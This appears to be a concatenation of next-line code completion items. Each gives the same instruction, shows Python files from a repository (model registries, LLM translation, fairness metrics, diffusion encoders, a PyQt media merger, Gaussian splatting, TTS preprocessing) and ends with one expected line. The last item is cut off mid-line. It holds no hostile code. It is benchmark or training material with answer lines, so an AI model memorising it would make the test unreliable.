You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: modelscope/scepter # Path: scepter/modules/utils/registry.py class Registry(object): """ A registry maps key to classes or functions. Example: # >>> MODELS = Registry('MODELS') # >>> @MODELS.register_class() # >>> class ResNet(object): # >>> pass # >>> config = Config(cfg_dict = {"NAME":"ResNet"}) # >>> resnet = MODELS.build(config) # >>> # >>> import torchvision # >>> @MODELS.register_function("InceptionV3") # >>> def get_inception_v3(pretrained=False, progress=True): # >>> return torchvision.model.inception_v3(pretrained=pretrained, progress=progress) # >>> config = Config(cfg_dict = {"NAME":"InceptionV3"}) # >>> inception_v3 = MODELS.build(config) Args: name (str): Registry name. build_func (func, None): Instance construct function. Default is build_from_config. allow_types (tuple): Indicates how to construct the instance, by constructing class or invoking function. """ def __init__(self, name, build_func=None, common_para=None, allow_types=('class', 'function')): self.name = name self.allow_types = allow_types self.class_map = {} self.func_map = {} self.common_para = common_para self.build_func = build_func or build_from_config REGISTRY_LIST.append(self) def get(self, req_type): return self.class_map.get(req_type) or self.func_map.get(req_type) def build(self, cfg, logger=None, *args, **kwargs): return self.build_func(cfg, registry=self, logger=logger, *args, **kwargs) def register_class(self, name=None): def _register(cls): if not inspect.isclass(cls): raise TypeError(f'Module must be type class, got {type(cls)}') if 'class' not in self.allow_types: raise TypeError( f'Register {self.name} only allows type {self.allow_types}, got class' ) module_name = name or cls.__name__ if module_name in self.class_map: warnings.warn( f'Class {module_name} already registered by {self.class_map[module_name]}, ' f'will be replaced by {cls}') self.class_map[module_name] = cls return cls return _register def register_function(self, name=None): def _register(func): if not inspect.isfunction(func): raise TypeError( f'Registry must be type function, got {type(func)}') if 'function' not in self.allow_types: raise TypeError( f'Registry {self.name} only allows type {self.allow_types}, got function' ) func_name = name or func.__name__ if func_name in self.class_map: warnings.warn( f'Function {func_name} already registered by {self.func_map[func_name]}, ' f'will be replaced by {func}') self.func_map[func_name] = func return func return _register def _list(self): keys = sorted(list(self.class_map.keys()) + list(self.func_map.keys())) descriptions = [] for key in keys: if key in self.class_map: descriptions.append(f'{key}: {self.class_map[key]}') else: descriptions.append( f"{key}: <function '{self.func_map[key].__module__}.{self.func_map[key].__name__}'>" ) return '\n'.join(descriptions) def __repr__(self): description = self._list() description = '\n'.join(['\t' + s for s in description.split('\n')]) return f'{self.__class__.__name__} [{self.name}], \n' + description def get_config_template(self, name): common_yaml_str = '' if self.common_para is not None: common_yaml_str += 'The following para are used for this class.\n' common_yaml_str += dict_to_yaml('common_parameter', __class__.__name__, self.common_para, set_name=False) req_type_entry = self.get(name) if req_type_entry is None: raise KeyError(f'{name} not found in {self.name} registry') if inspect.isclass(req_type_entry): return req_type_entry.get_config_template() + common_yaml_str elif inspect.isfunction(req_type_entry): return '{} is a function!'.format(name) else: return 'Unsurport object type!' # Path: scepter/modules/utils/registry.py def deep_copy(obj): return obj # Path: scepter/modules/opt/lr_schedulers/registry.py import inspect from scepter.modules.utils.registry import Registry, deep_copy from scepter.modules.utils.config import Config # -*- coding: utf-8 -*- # Copyright (c) Alibaba, Inc. and its affiliates. def build_lr_scheduler(cfg, registry, logger=None, *args, **kwargs): if not isinstance(cfg, Config): raise TypeError(f'config must be type dict, got {type(cfg)}') if not cfg.have('NAME'): raise KeyError(f'config must contain key NAME, got {cfg}')
if not isinstance(registry, Registry):
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: pigeonai-org/ViDove # Path: src/translators/LLM_task.py def LLM_task(model_name, input, task, temp = 0.15): """ Translates input sentence with desired LLM. :param model_name: The name of the translation model to be used. :param input: Sentence for translation. :param task: Prompt. :param temp: Model temperature. """ if model_name in ["gpt-3.5-turbo", "gpt-4", "gpt-4-1106-preview"]: response = openai.ChatCompletion.create( model=model_name, messages=[ {"role": "system","content": task}, {"role": "user", "content": input} ], temperature=temp ) return response['choices'][0]['message']['content'].strip() # Other LLM not implemented else: raise NotImplementedError # Path: src/srt_util/srt.py def split_script(script_in, chunk_size=1000): script_split = script_in.split('\n\n') script_arr = [] range_arr = [] start = 1 end = 0 script = "" for sentence in script_split: if len(script) + len(sentence) + 1 <= chunk_size: script += sentence + '\n\n' end += 1 else: range_arr.append((start, end)) start = end + 1 end += 1 script_arr.append(script.strip()) script = sentence + '\n\n' if script.strip(): script_arr.append(script.strip()) range_arr.append((start, len(script_split) - 1)) assert len(script_arr) == len(range_arr) return script_arr, range_arr # Path: src/translators/translation.py from os import getenv from time import sleep from tqdm import tqdm from .LLM_task import LLM_task from src.srt_util.srt import split_script import logging def get_translation(srt, model, video_name, prompt = None, chunk_size = 1000): # print(srt.get_source_only()) script_arr, range_arr = split_script(srt.get_source_only(),chunk_size) translate(srt, script_arr, range_arr, model, video_name, task=prompt) pass def check_translation(sentence, translation): """ check merge sentence issue from openai translation """ sentence_count = sentence.count('\n\n') + 1 translation_count = translation.count('\n\n') + 1 if sentence_count != translation_count: return False else: return True # TODO{david}: prompts selector def prompt_selector(src_lang, tgt_lang, domain): language_map = { "EN": "English", "ZH": "Chinese", "ES": "Spanish", "FR": "France", "DE": "Germany", "RU": "Russian", "JA": "Japanese", "AR": "Arabic", } try: src_lang = language_map[src_lang] tgt_lang = language_map[tgt_lang] except: print("Unsupported language, is your abbreviation correct?") logging.info("Unsupported language detected") prompt = f""" you are a translation assistant, your job is to translate a video in domain of {domain} from {src_lang} to {tgt_lang}, you will be provided with a segement in {src_lang} parsed by line, where your translation text should keep the original meaning and the number of lines. """ return prompt def translate(srt, script_arr, range_arr, model_name, video_name=None, attempts_count=5, task=None, temp = 0.15): """ Translates the given script array into another language using the chatgpt and writes to the SRT file. This function takes a script array, a range array, a model name, a video name, and a video link as input. It iterates through sentences and range in the script and range arrays. If the translation check fails for five times, the function will attempt to resolve merge sentence issues and split the sentence into smaller tokens for a better translation. :param srt: An instance of the Subtitle class representing the SRT file. :param script_arr: A list of strings representing the original script sentences to be translated. :param range_arr: A list of tuples representing the start and end positions of sentences in the script. :param model_name: The name of the translation model to be used. :param video_name: The name of the video. :param attempts_count: Number of attemps of failures for unmatched sentences. :param task: Prompt. :param temp: Model temperature. """ if input is None: raise Exception("Warning! No Input have passed to LLM!") if task is None: task = "你是一个翻译助理,你的任务是翻译视频,你会被提供一个按行分割的英文段落,你需要在保证句意和行数的情况下输出翻译后的文本。" logging.info(f"translation prompt: {task}") previous_length = 0 for sentence, range_ in tqdm(zip(script_arr, range_arr)): # update the range based on previous length range_ = (range_[0] + previous_length, range_[1] + previous_length) # using chatgpt model print(f"now translating sentences {range_}") logging.info(f"now translating sentences {range_}") flag = True while flag: flag = False try:
translate = LLM_task(model_name, sentence, task, temp)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: YyzHarry/shortcut-ood-fairness # Path: utils/eval_helper.py def binary_metrics(targets, preds, label_set=[0, 1], suffix='', return_arrays=False): if len(targets) == 0: return {} res = { 'accuracy': accuracy_score(targets, preds), 'n_samples': len(targets) } if len(label_set) == 2: CM = confusion_matrix(targets, preds, labels=label_set) res['TN'] = CM[0][0].item() res['FN'] = CM[1][0].item() res['TP'] = CM[1][1].item() res['FP'] = CM[0][1].item() res['error'] = res['FN'] + res['FP'] if res['TP'] + res['FN'] == 0: res['TPR'] = 0 res['FNR'] = 1 else: res['TPR'] = res['TP']/(res['TP']+res['FN']) res['FNR'] = res['FN']/(res['TP']+res['FN']) if res['FP'] + res['TN'] == 0: res['FPR'] = 1 res['TNR'] = 0 else: res['FPR'] = res['FP']/(res['FP']+res['TN']) res['TNR'] = res['TN']/(res['FP']+res['TN']) res['pred_prevalence'] = (res['TP'] + res['FP']) / res['n_samples'] res['prevalence'] = (res['TP'] + res['FN']) / res['n_samples'] else: CM = confusion_matrix(targets, preds, labels=label_set) res['TPR'] = recall_score(targets, preds, labels=label_set, average='macro', zero_division=0.) if len(np.unique(targets)) > 1: res['balanced_acc'] = balanced_accuracy_score(targets, preds) if return_arrays: res['targets'] = targets res['preds'] = preds return {f"{i}{suffix}": res[i] for i in res} # Path: utils/eval_helper.py def prob_metrics(targets, preds, label_set, return_arrays=False): if len(targets) == 0: return {} res = { 'BCE': log_loss(targets, preds, eps=1e-6, labels=label_set), 'ECE': netcal.metrics.ECE().measure(preds, targets) } if len(set(targets)) > 2: # happens when you predict a class, but there are no samples with that class in the dataset try: res['AUROC'] = roc_auc_score(targets, preds, multi_class='ovr', labels=label_set) except: res['AUROC'] = roc_auc_score(targets, preds, multi_class='ovo', labels=label_set) elif len(set(targets)) == 2: res['AUROC'] = roc_auc_score(targets, preds, labels=label_set) elif len(set(targets)) == 1: res['AUROC'] = None if len(set(targets)) == 2: # res['ROC_curve'] = roc_curve(targets, preds) res['AUPRC'] = average_precision_score(targets, preds, average='macro') res['brier'] = brier_score_loss(targets, preds) res['mean_pred_1'] = preds[targets == 1].mean() res['mean_pred_0'] = preds[targets == 0].mean() if return_arrays: res['targets'] = targets res['preds'] = preds return res # Path: utils/lin_eval.py import numpy as np import torch from utils.eval_helper import binary_metrics, prob_metrics from sklearn.model_selection import GridSearchCV, PredefinedSplit from sklearn.pipeline import Pipeline from sklearn.linear_model import LogisticRegression from sklearn.base import clone from sklearn.metrics import roc_auc_score from sklearn.ensemble import RandomForestClassifier def get_representations(algorithm, loader, device): ys, atts, zs = [], [], [] algorithm.eval() with torch.no_grad(): for _, x, y, a in loader: z = algorithm.return_feats(x.to(device)).detach().cpu().numpy() zs.append(z) ys.append(y) atts.append(a) return np.concatenate(zs, axis=0), np.concatenate(atts, axis=0), np.concatenate(ys, axis=0) def fit_model(train_X, train_Y, val_X, val_Y, test_X, test_Y, model_type='lr'): if model_type == 'lr': pipe = Pipeline(steps=[ ('model', LogisticRegression(random_state=42, n_jobs=-1)) ]) param_grid = { 'model__C': 10**np.linspace(-5, 1, 10) } elif model_type == 'rf': pipe = Pipeline(steps=[ ('model', RandomForestClassifier(random_state=42, n_jobs=-1)) # ('model', XGBClassifier(random_state=42, n_jobs=-1)) ]) param_grid = { 'model__max_depth': list(range(1, 7)) } else: raise NotImplementedError pds = PredefinedSplit(test_fold=np.concatenate([np.ones((len(train_X),))*-1, np.zeros((len(val_X),))])) cv_lr = (GridSearchCV(pipe, param_grid, refit=False, cv=pds, scoring='roc_auc_ovr', verbose=10, n_jobs=-1).fit( np.concatenate((train_X, val_X)), np.concatenate((train_Y, val_Y)))) pipe = clone( clone(pipe).set_params(**cv_lr.best_params_) ) pipe = pipe.fit(train_X, train_Y) label_set = np.sort(np.unique(train_Y)) res = {} for sset, X, Y in zip(['va', 'te'], [val_X, test_X], [val_Y, test_Y]): preds = pipe.predict_proba(X) if len(label_set) == 2: preds = preds[:, 1] preds_rounded = preds >= 0.5 else: preds_rounded = preds.argmax(1)
res[sset] = binary_metrics(Y, preds_rounded, label_set=label_set, return_arrays=True)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: RomGai/BrainVis # Path: dc_ldm/modules/x_transformer.py class Encoder(AttentionLayers): def __init__(self, **kwargs): assert 'causal' not in kwargs, 'cannot set causality on encoder' super().__init__(causal=False, **kwargs) # Path: dc_ldm/modules/x_transformer.py class TransformerWrapper(nn.Module): def __init__( self, *, num_tokens, max_seq_len, attn_layers, emb_dim=None, max_mem_len=0., emb_dropout=0., num_memory_tokens=None, tie_embedding=False, use_pos_emb=True ): super().__init__() assert isinstance(attn_layers, AttentionLayers), 'attention layers must be one of Encoder or Decoder' dim = attn_layers.dim emb_dim = default(emb_dim, dim) self.max_seq_len = max_seq_len self.max_mem_len = max_mem_len self.num_tokens = num_tokens self.token_emb = nn.Embedding(num_tokens, emb_dim) self.pos_emb = AbsolutePositionalEmbedding(emb_dim, max_seq_len) if ( use_pos_emb and not attn_layers.has_pos_emb) else always(0) self.emb_dropout = nn.Dropout(emb_dropout) self.project_emb = nn.Linear(emb_dim, dim) if emb_dim != dim else nn.Identity() self.attn_layers = attn_layers self.norm = nn.LayerNorm(dim) self.init_() self.to_logits = nn.Linear(dim, num_tokens) if not tie_embedding else lambda t: t @ self.token_emb.weight.t() # memory tokens (like [cls]) from Memory Transformers paper num_memory_tokens = default(num_memory_tokens, 0) self.num_memory_tokens = num_memory_tokens if num_memory_tokens > 0: self.memory_tokens = nn.Parameter(torch.randn(num_memory_tokens, dim)) # let funnel encoder know number of memory tokens, if specified if hasattr(attn_layers, 'num_memory_tokens'): attn_layers.num_memory_tokens = num_memory_tokens def init_(self): nn.init.normal_(self.token_emb.weight, std=0.02) def forward( self, x, return_embeddings=False, mask=None, return_mems=False, return_attn=False, mems=None, **kwargs ): # b, n, device, num_mem = *x.shape, x.device, self.num_memory_tokens b = x.shape[0] device = x.device num_mem = self.num_memory_tokens x = self.token_emb(x) x += self.pos_emb(x) x = self.emb_dropout(x) x = self.project_emb(x) if num_mem > 0: mem = repeat(self.memory_tokens, 'n d -> b n d', b=b) x = torch.cat((mem, x), dim=1) # auto-handle masking after appending memory tokens if exists(mask): mask = F.pad(mask, (num_mem, 0), value=True) x, intermediates = self.attn_layers(x, mask=mask, mems=mems, return_hiddens=True, **kwargs) x = self.norm(x) mem, x = x[:, :num_mem], x[:, num_mem:] out = self.to_logits(x) if not return_embeddings else x if return_mems: hiddens = intermediates.hiddens new_mems = list(map(lambda pair: torch.cat(pair, dim=-2), zip(mems, hiddens))) if exists(mems) else hiddens new_mems = list(map(lambda t: t[..., -self.max_mem_len:, :].detach(), new_mems)) return out, new_mems if return_attn: attn_maps = list(map(lambda t: t.post_softmax_attn, intermediates.attn_intermediates)) return out, attn_maps return out # Path: dc_ldm/modules/encoders/modules.py import torch import torch.nn as nn import sys import kornia from functools import partial from PIL import Image from einops import rearrange, repeat from transformers import CLIPTokenizer, CLIPTextModel, AutoProcessor, CLIPVisionModel, CLIPVisionModelWithProjection from dc_ldm.modules.x_transformer import Encoder, TransformerWrapper # TODO: can we directly rely on lucidrains code and simply add this as a reuirement? --> test from transformers import BertTokenizerFast # TODO: add to reuquirements # import clip sys.path.append('../dreamdiffusion/code/') class AbstractEncoder(nn.Module): def __init__(self): super().__init__() def encode(self, *args, **kwargs): raise NotImplementedError class ClassEmbedder(nn.Module): def __init__(self, embed_dim, n_classes=1000, key='class'): super().__init__() self.key = key self.embedding = nn.Embedding(n_classes, embed_dim) def forward(self, batch, key=None): if key is None: key = self.key # this is for use in crossattn c = batch[key][:, None] c = self.embedding(c) return c class TransformerEmbedder(AbstractEncoder): """Some transformer encoder layers""" def __init__(self, n_embed, n_layer, vocab_size, max_seq_len=77, device="cuda"): super().__init__() self.device = device
self.transformer = TransformerWrapper(num_tokens=vocab_size, max_seq_len=max_seq_len,
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Rajeshwaran2001/DRM-Media-Tool # Path: helper/message.py def show_error_message(parent, message): error_box = QMessageBox() error_box.setIcon(QMessageBox.Critical) error_box.setWindowTitle("Error") error_box.setText(message) error_box.setWindowIcon(parent.windowIcon()) error_box.exec_() # Path: helper/message.py def show_success_message(parent, message): success_box = QMessageBox() success_box.setIcon(QMessageBox.Information) success_box.setWindowTitle("Success") success_box.setText(message) success_box.setWindowIcon(parent.windowIcon()) success_box.exec_() # Path: file_merger_dialog.py from PyQt5.QtWidgets import QWidget, QDialog, QVBoxLayout, QLabel, QTableWidget, QPushButton, QHBoxLayout, QTableWidgetItem, QCheckBox from helper.message import show_error_message, show_success_message import os import json import subprocess class FileMergerDialog(QDialog): def __init__(self, debug_logger, info_logger, folder_path, parent=None): super().__init__(parent) self.folder_path = folder_path self.setWindowTitle("Files Merger") self.setGeometry(100, 100, 600, 300) self.layout = QVBoxLayout() self.file_table_label = QLabel("Files in Directory:") self.file_table_widget = QTableWidget() self.file_table_widget.setColumnCount( 3) # Added a column for checkboxes self.file_table_widget.setHorizontalHeaderLabels( ["File Name", "Select", "Type"]) self.merge_button = QPushButton("Merge") self.merge_button.clicked.connect(self.merge_files) self.layout.addWidget(self.file_table_label) self.layout.addWidget(self.file_table_widget) self.layout.addWidget(self.merge_button) self.setLayout(self.layout) self.populate_file_table() self.file_table_widget.setColumnWidth(0, 400) self.debug_logger = debug_logger self.info_logger = info_logger def populate_file_table(self): # Clear existing items in the table widget self.file_table_widget.setRowCount(0) try: # List only video and audio files in the specified directory video_files = [file for file in os.listdir( self.folder_path) if file.lower().endswith(('.mp4', '.mkv', '.avi', '.webm'))] audio_files = [file for file in os.listdir( self.folder_path) if file.lower().endswith(('.mp3', '.wav', '.ogg', '.m4a', '.webm'))] # Add video files to the table widget for idx, file in enumerate(video_files): self.add_file_to_table(idx, file, "Video") # Add audio files to the table widget for idx, file in enumerate(audio_files, start=len(video_files)): self.add_file_to_table(idx, file, "Audio") except FileNotFoundError: # Handle the case where the specified directory does not exist self.file_table_widget.setRowCount(1) self.file_table_widget.setItem( 0, 2, QTableWidgetItem("Directory not found")) def add_file_to_table(self, idx, file, file_type): self.file_table_widget.insertRow(idx) # Center-align the content in the first column item_file_name = QTableWidgetItem(file) item_file_name.setTextAlignment(0x0004 | 0x0080) # AlignCenter self.file_table_widget.setItem(idx, 0, item_file_name) # Create a widget for the checkbox and center-align it checkbox_widget = QWidget() checkbox_layout = QHBoxLayout(checkbox_widget) checkbox_layout.addStretch(3) checkbox = QCheckBox() checkbox.setChecked(False) checkbox_layout.addWidget(checkbox) checkbox_layout.addStretch(3) # Set the widget with the centered checkbox in the second column self.file_table_widget.setCellWidget(idx, 1, checkbox_widget) # Set the file type in the third column self.file_table_widget.setItem(idx, 2, QTableWidgetItem(file_type)) def merge_files(self): selected_files = [] metadata = {} for row in range(self.file_table_widget.rowCount()): checkbox = self.file_table_widget.cellWidget( row, 1).layout().itemAt(1).widget() if checkbox.isChecked(): file_name = self.file_table_widget.item(row, 0).text() file_type = self.file_table_widget.item(row, 2).text() selected_files.append((file_name, file_type)) # Check if there are at least one video and one audio file selected if any(file_type == 'Video' for (_, file_type) in selected_files) and \ any(file_type == 'Audio' for (_, file_type) in selected_files): # Get all files in the directory ending with .info.json info_files = [file for file in os.listdir( self.folder_path) if file.endswith('.info.json')] img_files = [file for file in os.listdir( self.folder_path) if file.lower().endswith(('.jpg', '.jpeg', '.png', '.webp'))] language_mapping = { 'en': 'eng', 'eng': 'eng', 'english': 'eng', 'ta': 'tam', 'tamil': 'tam', 'tam': 'tam' } # Define language codes language_codes = list(language_mapping.keys()) suffixes = tuple(f'.{code}.vtt' for code in language_codes) subtitle_files = [file for file in os.listdir( self.folder_path) if file.endswith(suffixes)] thumbnail_file = None # Initialize with a default value # print(subtitle_files) if not info_files:
show_error_message(self, "Error: No Metadata files found.")
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: gmum/ViewingDirectionGaussianSplatting # Path: utils/graphics_utils.py def getWorld2View2(R, t, translate=np.array([.0, .0, .0]), scale=1.0): Rt = np.zeros((4, 4)) Rt[:3, :3] = R.transpose() Rt[:3, 3] = t Rt[3, 3] = 1.0 C2W = np.linalg.inv(Rt) cam_center = C2W[:3, 3] cam_center = (cam_center + translate) * scale C2W[:3, 3] = cam_center Rt = np.linalg.inv(C2W) return np.float32(Rt) # Path: utils/graphics_utils.py def getProjectionMatrix(znear, zfar, fovX, fovY): tanHalfFovY = math.tan((fovY / 2)) tanHalfFovX = math.tan((fovX / 2)) top = tanHalfFovY * znear bottom = -top right = tanHalfFovX * znear left = -right P = torch.zeros(4, 4) z_sign = 1.0 P[0, 0] = 2.0 * znear / (right - left) P[1, 1] = 2.0 * znear / (top - bottom) P[0, 2] = (right + left) / (right - left) P[1, 2] = (top + bottom) / (top - bottom) P[3, 2] = z_sign P[2, 2] = z_sign * zfar / (zfar - znear) P[2, 3] = -(zfar * znear) / (zfar - znear) return P # Path: scene/cameras.py import torch import numpy as np from torch import nn from utils.graphics_utils import getWorld2View2, getProjectionMatrix # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # class Camera(nn.Module): def __init__(self, colmap_id, R, T, FoVx, FoVy, image, gt_alpha_mask, image_name, uid, trans=np.array([0.0, 0.0, 0.0]), scale=1.0, data_device = "cuda" ): super(Camera, self).__init__() self.uid = uid self.colmap_id = colmap_id self.R = R self.T = T self.FoVx = FoVx self.FoVy = FoVy self.image_name = image_name try: self.data_device = torch.device(data_device) except Exception as e: print(e) print(f"[Warning] Custom device {data_device} failed, fallback to default cuda device" ) self.data_device = torch.device("cuda") self.original_image = image.clamp(0.0, 1.0).to(self.data_device) self.image_width = self.original_image.shape[2] self.image_height = self.original_image.shape[1] if gt_alpha_mask is not None: self.original_image *= gt_alpha_mask.to(self.data_device) else: self.original_image *= torch.ones((1, self.image_height, self.image_width), device=self.data_device) self.zfar = 100.0 self.znear = 0.01 self.trans = trans self.scale = scale self.world_view_transform = torch.tensor(getWorld2View2(R, T, trans, scale)).transpose(0, 1).cuda()
self.projection_matrix = getProjectionMatrix(znear=self.znear, zfar=self.zfar, fovX=self.FoVx, fovY=self.FoVy).transpose(0,1).cuda()
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: tonnetonne814/PL-Bert-VITS2 # Path: PL_BERT_ja/text_utils.py class TextCleaner: def __init__(self, dummy=None): self.word_index_dictionary = symbol_to_id def __call__(self, text): indexes = [] japanese = False for char in text: try: indexes.append(self.word_index_dictionary[char]) except: if char == "。" or char == "、": indexes.append(0) # padとして扱う return indexes # Path: PL_BERT_ja/phonemize.py def phonemize(text, tokenizer): text = unicodedata.normalize("NFKC", text) words = tokenizer.tokenize(text) input_ids_ = tokenizer.convert_tokens_to_ids(words) phonemes = [] input_ids = [] for i in range(len(words)): word = words[i] input_id = input_ids_[i] phoneme = global_phonemize(word.replace('#', '')) if len(phoneme) != 0: phonemes.append(''.join(phoneme)) input_ids.append(input_id) assert len(input_ids) == len(phonemes) return {'input_ids' : input_ids, 'phonemes': phonemes} # Path: PL_BERT_ja/model.py class MultiTaskModel(nn.Module): def __init__(self, model, num_tokens, num_vocab, hidden_size): super().__init__() self.encoder = model self.mask_predictor = nn.Linear(hidden_size, num_tokens) self.word_predictor = nn.Linear(hidden_size, num_vocab) def forward(self, phonemes, attention_mask=None): output = self.encoder(phonemes, attention_mask=attention_mask, output_hidden_states=True) tokens_pred = self.mask_predictor(output.last_hidden_state) words_pred = self.word_predictor(output.last_hidden_state) return tokens_pred, words_pred, output # Path: preprocess_ja.py import argparse import os import polars import random import torch import yaml, torch from PL_BERT_ja.text_utils import TextCleaner from PL_BERT_ja.phonemize import phonemize from tqdm import tqdm from PL_BERT_ja.model import MultiTaskModel from transformers import AlbertConfig, AlbertModel from transformers import BertJapaneseTokenizer def preprocess(dataset_dir, pl_bert_dir): n_val_test_file = 10 filelist_dir = "./filelists/" dataset_name = "jvnv_ver1" os.makedirs(filelist_dir, exist_ok=True) split_symbol = "||||" transcript_csv_df = polars.read_csv(os.path.join(dataset_dir, "jvnv_v1", "transcription.csv"),has_header=False)[:, 0] emo_list = os.listdir(os.path.join(dataset_dir,"jvnv_v1", "F1")) style_list = os.listdir(os.path.join(dataset_dir,"jvnv_v1", "F1", "anger")) pl_bert_savedir = "./pl_bert_embeddings" os.makedirs(pl_bert_savedir, exist_ok=True) pl_bert_model, pl_bert_config, device = get_pl_bert_ja(dir=pl_bert_dir) pl_bert_cleaner = TextCleaner() pl_bert_tokenizer = BertJapaneseTokenizer.from_pretrained(pl_bert_config['dataset_params']['tokenizer']) hidden_size = pl_bert_config["model_params"]["hidden_size"] n_layers = pl_bert_config["model_params"]["num_hidden_layers"] + 1 filelists = list() spk_g = ["F", "M"] for line in tqdm(transcript_csv_df): index_name, emo_prefix, text = line.split("|") emotion, style, file_idx = index_name.split("_") text = text.replace("\n", "") phonemes = ''.join(phonemize(text,pl_bert_tokenizer)["phonemes"]) input_ids = pl_bert_cleaner(phonemes) with torch.inference_mode(): hidden_stats = pl_bert_model(torch.tensor(input_ids, dtype=torch.int64, device=device).unsqueeze(0))[-1]["hidden_states"] save_tensor = torch.zeros(size=(n_layers, len(input_ids), hidden_size), device=device) for idx, hidden_stat in enumerate(hidden_stats): save_tensor[idx, :, :] = hidden_stat torch.save(save_tensor.to('cpu').detach(), os.path.join(pl_bert_savedir, f"{index_name}.PlBertJa")) for g_idx in range(2): for spk_idx in range(2): spk_ID = str(g_idx + spk_idx*2) spk = spk_g[g_idx] + str(spk_idx+1) wav_path = os.path.join(dataset_dir, "jvnv_v1", spk, emotion, style, f"{spk}_{emotion}_{style}_{file_idx}.wav") filelists.append(f"{wav_path}{split_symbol}{spk_ID}{split_symbol}{phonemes}{split_symbol}{text}{split_symbol}{index_name}{split_symbol}emo:{str(emo_list.index(emotion))}{split_symbol}style:{str(style_list.index(style))}\n") val_list = list() test_list = list() for idx in range(n_val_test_file*2): target_idx = random.randint(0, len(filelists)) target_line = filelists.pop(target_idx) if idx % 2 == 1: val_list.append(target_line) else: test_list.append(target_line) write_txt(filelists, os.path.join(filelist_dir, f"{dataset_name}_train.txt")) write_txt(val_list, os.path.join(filelist_dir, f"{dataset_name}_val.txt")) write_txt(test_list, os.path.join(filelist_dir, f"{dataset_name}_test.txt")) return 0 def write_txt(lists, path): with open(path, mode="w", encoding="utf-8") as f: f.writelines(lists) def get_pl_bert_ja(dir): device = torch.device("cuda" if torch.cuda.is_available() else "cpu") config_path=os.path.join(dir, "config.yml") config = yaml.safe_load(open(config_path)) albert_base_configuration = AlbertConfig(**config['model_params']) bert_ = AlbertModel(albert_base_configuration).to(device) #num_vocab = max([m['token'] for m in token_maps.values()]) + 1 # 30923 + 1
bert = MultiTaskModel(
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Ruiyuan-Zhang/CCS # Path: multi_part_assembly/models/modules/encoder/point_transformer/pointnet_util.py def index_points(points, idx): """ Input: points: input points data, [B, N, C] idx: sample index data, [B, S, [K]] Return: new_points:, indexed points data, [B, S, [K], C] """ raw_size = idx.size() idx = idx.reshape(raw_size[0], -1) res = torch.gather(points, 1, idx[..., None].expand(-1, -1, points.size(-1))) return res.reshape(*raw_size, -1) # Path: multi_part_assembly/models/modules/encoder/point_transformer/pointnet_util.py def square_distance(src, dst): """ Calculate Euclid distance between each two points. src^T * dst = xn * xm + yn * ym + zn * zm; sum(src^2, dim=-1) = xn*xn + yn*yn + zn*zn; sum(dst^2, dim=-1) = xm*xm + ym*ym + zm*zm; dist = (xn - xm)^2 + (yn - ym)^2 + (zn - zm)^2 = sum(src**2,dim=-1)+sum(dst**2,dim=-1)-2*src^T*dst Input: src: source points, [B, N, C] dst: target points, [B, M, C] Output: dist: per-point square distance, [B, N, M] """ return torch.sum((src[:, :, None] - dst[:, None]) ** 2, dim=-1) # Path: multi_part_assembly/models/modules/encoder/point_transformer/transformer.py from multi_part_assembly.models.modules.encoder.point_transformer.pointnet_util import index_points, square_distance import torch import torch.nn as nn import torch.nn.functional as F import numpy as np class TransformerBlock(nn.Module): def __init__(self, d_points, d_model, k) -> None: super().__init__() self.fc1 = nn.Linear(d_points, d_model) self.fc2 = nn.Linear(d_model, d_points) self.fc_delta = nn.Sequential( nn.Linear(3, d_model), nn.ReLU(), nn.Linear(d_model, d_model) ) self.fc_gamma = nn.Sequential( nn.Linear(d_model, d_model), nn.ReLU(), nn.Linear(d_model, d_model) ) self.w_qs = nn.Linear(d_model, d_model, bias=False) self.w_ks = nn.Linear(d_model, d_model, bias=False) self.w_vs = nn.Linear(d_model, d_model, bias=False) self.k = k # xyz: b x n x 3, features: b x n x f def forward(self, xyz, features):
dists = square_distance(xyz, xyz)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: uc-vision/taichi-splatting # Path: taichi_splatting/data_types.py class RasterConfig: tile_size: int = 16 # pixel tilin per thread in the backwards pass pixel_stride: Tuple[int, int] = (2, 2) margin_tiles: int = 3 # cutoff N standard deviations from mean gaussian_scale: float = 3.0 # cull to an oriented box, otherwise an axis aligned bounding box tight_culling: bool = True clamp_max_alpha: float = 0.99 alpha_threshold: float = 1. / 255. saturate_threshold: float = 0.9999 # Path: taichi_splatting/renderer2d.py def project_gaussians2d(points: Gaussians2D) -> torch.Tensor: def render_gaussians( gaussians: Gaussians2D, image_size: Tuple[Integral, Integral], raster_config: RasterConfig ): # Path: taichi_splatting/tests/random_data.py def random_2d_gaussians(n, image_size, scale_factor=1.0, alpha_range=(0.1, 0.9), depth_range=(0.1, 100.0)): w, h = image_size position = torch.rand(n, 2) * torch.tensor([w, h], dtype=torch.float32).unsqueeze(0) depth = torch.rand((n, 1)) * (depth_range[1] - depth_range[0]) + depth_range[0] density_scale = scale_factor * w / (1 + 